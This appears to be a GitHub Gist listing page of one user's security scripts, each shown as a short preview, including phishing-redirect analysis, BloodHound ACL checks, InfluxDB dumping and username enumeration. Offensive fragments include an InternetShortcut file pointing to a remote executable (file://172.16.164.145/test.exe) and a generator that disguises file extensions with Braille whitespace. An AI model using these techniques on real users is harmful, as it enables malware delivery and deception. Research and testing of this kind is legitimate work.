Keith Lee milo2012
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import base64 | |
| import click | |
| import six | |
| import itertools | |
| from cryptography.hazmat.backends import default_backend | |
| from cryptography.hazmat.primitives import hashes | |
| from cryptography.hazmat.decrepit.ciphers.algorithms import ARC4 | |
| from cryptography.hazmat.primitives.kdf.pbkdf2 import PBKDF2HMAC | |
| from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes | |
| from cryptography.hazmat.primitives import padding |
milo2012
/ bing_ck_phishing_analyzer.py
Created
February 10, 2025 12:58
This script is designed to analyze phishing URLs, particularly those that abuse Bing's tracking system (bing.com/ck). It extracts the real destination URL, tracks redirections, and captures screenshots at each step to help analyze how phishing campaigns redirect users to malicious sites.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import argparse | |
| import asyncio | |
| from playwright.async_api import async_playwright | |
| from typing import Optional, List | |
| import time | |
| import base64 | |
| import urllib.parse | |
| """ | |
| Phishing URL Redirection Tracker |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| [InternetShortcut] | |
| URL=file://172.16.164.145/test.exe | |
| IconIndex=1 | |
| HotKey=0 | |
| IDList= | |
| IconFile=C:\Windows\System32\SHELL32.dll | |
| [{009862A0-0000-0000-C0000-000000005986}] | |
| Prop3=19,9 | |
| [{000214A0-0000-0000-C0000-000000000046}] | |
| [InternetShortcut.A] |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from http.server import BaseHTTPRequestHandler, HTTPServer | |
| from datetime import datetime, timezone | |
| import struct | |
| import base64 | |
| from binascii import hexlify | |
| class WebDAVRequestHandler(BaseHTTPRequestHandler): | |
| protocol_version = "HTTP/1.1" # Ensure HTTP/1.1 is used | |
| def version_string(self): |
milo2012
/ check_weak_acls_bloodhound.py
Created
November 30, 2024 07:47
check_weak_acls_bloodhound.py
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from neo4j import GraphDatabase | |
| from tabulate import tabulate | |
| import argparse | |
| from itertools import groupby # Make sure to import groupby from itertools | |
| import sys | |
| # Initialize the driver | |
| uri = "bolt://localhost:7687" # Change to your Neo4j server URI | |
| username = "neo4j" # Your Neo4j username | |
| password = "bloodhoundcommunityedition" # Your Neo4j password |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import argparse | |
| import os | |
| import urllib.parse | |
| # Reference: https://vulnera.com/newswire/void-banshee-apt-group-exploits-windows-mshtml-spoofing-vulnerability/?utm_source=rss&utm_medium=rss&utm_campaign=void-banshee-apt-group-exploits-windows-mshtml-spoofing-vulnerability | |
| # Define the encoded Braille whitespace character sequence | |
| BRAILLE_WHITESPACE = "%E2%A0%80" * 26 | |
| def create_spoofed_file(input_file, output_base, fake_extension): |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import requests | |
| import argparse | |
| import re | |
| from concurrent.futures import ThreadPoolExecutor, as_completed | |
| from requests.packages.urllib3.exceptions import InsecureRequestWarning | |
| requests.packages.urllib3.disable_warnings(InsecureRequestWarning) | |
| requests.packages.urllib3.disable_warnings() | |
| def check_usernames(file_path, base_url, num_threads): |
milo2012
/ searchMSIGetCustomActions.ps1
Last active
July 25, 2024 08:26
searchMSIGetCustomActions.ps1
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Get-CustomActionsFromMSI { | |
| param ( | |
| [string]$msiPath | |
| ) | |
| try { | |
| # Load the Windows Installer COM object | |
| $installer = New-Object -ComObject WindowsInstaller.Installer | |
| # Open the MSI database in read-only mode |
milo2012
/ queryInfluxDB.py
Created
June 20, 2024 04:57
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import argparse | |
| import requests | |
| import re | |
| def main(): | |
| # Parse command line arguments | |
| parser = argparse.ArgumentParser(description='Dump data from a specific measurement/table in an InfluxDB instance via HTTP API.') | |
| parser.add_argument('-u', '--url', type=str, required=True, help='URL of the InfluxDB query endpoint') | |
| parser.add_argument('-d', '--database', type=str, help='Name of the database') | |
| parser.add_argument('-t', '--table', type=str, help='Name of the measurement/table') |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| package main | |
| import ( | |
| //"flag" | |
| "log" | |
| "fmt" | |
| "strings" | |
| "time" | |
| "github.com/stephen-fox/user32util" | |
| ) | |
| var timeout time.Duration = 1 |
NewerOlder